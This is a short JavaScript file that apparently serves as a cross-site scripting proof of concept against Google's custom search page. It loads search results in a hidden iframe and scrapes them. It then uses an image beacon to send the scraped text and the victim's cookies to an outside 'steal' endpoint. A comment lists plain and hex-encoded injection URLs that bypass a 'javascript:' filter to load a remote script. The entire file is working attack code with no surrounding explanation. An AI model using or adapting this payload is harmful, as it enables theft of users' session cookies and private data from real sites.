alert(2)
document.images[0].src="http://www.google.com/images/logo.gif";
window.attachEvent('onload',func2)
function func2() {
el=document.createElement('iframe')
		if (document.forms[0].q.value=="") {
				el.src="http://www.google.com/search?hl=en&lr=&safe=off&q=password";
		} else {
				el.src="http://www.google.com/search?hl=en&lr=&safe=off&q="+document.forms[0].q.value;
		}
el.width=0;
el.height=0;
document.body.appendChild(el);
setTimeout(func,2000);
}
document.forms[0].onsubmit=function() {
				document.forms[0].cof.value=(document.forms[0].cof.value+'').replace('javascript:','javascript:javascript:');
}
 function func() {
		var txt=el.contentWindow.document.body.innerHTML;
		txt=txt.substr(txt.indexOf('onebox'),txt.length);
		txt=txt.substr(0,txt.indexOf('</TABLE>'));
		x=new Image();
		x.src="http://jibbering.com/steal.1?data="+encodeURIComponent(txt.replace(/<.*?>/gim,''))+"&cookie="+document.cookie;
}
/*
http://www.google.com/custom?cof=L:javascript:javascript:document.appendChild(document.createElement('script')).src%3D'http%3A%2F%2F217.155.143.65%2Ftest.js'

http://www.google.com/custom?cof=L:%6a%61%76%61%73%63%72%69%70%74%3a%6a%61%76%61%73%63%72%69%70%74%3a%64%6f%63%75%6d%65%6e%74%2e%61%70%70%65%6e%64%43%68%69%6c%64%28%64%6f%63%75%6d%65%6e%74%2e%63%72%65%61%74%65%45%6c%65%6d%65%6e%74%28%27%73%63%72%69%70%74%27%29%29%2e%73%72%63%3d%27%68%74%74%70%3a%2f%2f%32%31%37%2e%31%35%35%2e%31%34%33%2e%36%35%2f%74%65%73%74%2e%6a%73%27 
*/
